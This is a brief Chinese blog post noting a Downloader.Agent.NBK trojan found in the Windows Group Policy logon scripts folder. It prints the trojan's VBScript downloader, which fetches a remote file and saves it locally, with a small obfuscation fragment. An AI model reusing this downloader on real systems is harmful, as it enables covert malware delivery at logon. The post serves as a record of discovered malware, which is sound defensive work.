***Downloader.Agent.NBK木马脚本
C:\WINDOWS\system32\GroupPolicy\User\Scripts\Logon 目录下的三个文件
donw.vbs
shijian.vbs
sys.bat
sys.bat 内容:
donw.vbs 内容:
on error resume next
iLocal=LCase(Wscript.Arguments(1))
iRemote=LCase(Wscript.Arguments(0))
iUser=LCase(Wscript.Arguments(2))
iPass=LCase(Wscript.Arguments(3))
set xPost=CreateObject("Microsoft.XML" & tian6 & "HTTP")
wscript.sleep 1
if iUser="" and iPass="" then
xPost.Open "GET",iRemote,0
else
xPost.Open "GET",iRemote,0,iUser,iPass
end if
xPost.Send()
set sGet=CreateObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xPost.ResponseBody
sGet.SaveToFile iLocal,1
shijian.vbs 内容:
Dim Wsh
set ws=wscript.createobject("wscript.shell")
Wscript.Sleep 1000
本文转自jasonccier 51CTO博客,原文链接:http://blog.51cto.com/jasonccie/397041,如需转载请自行联系原作者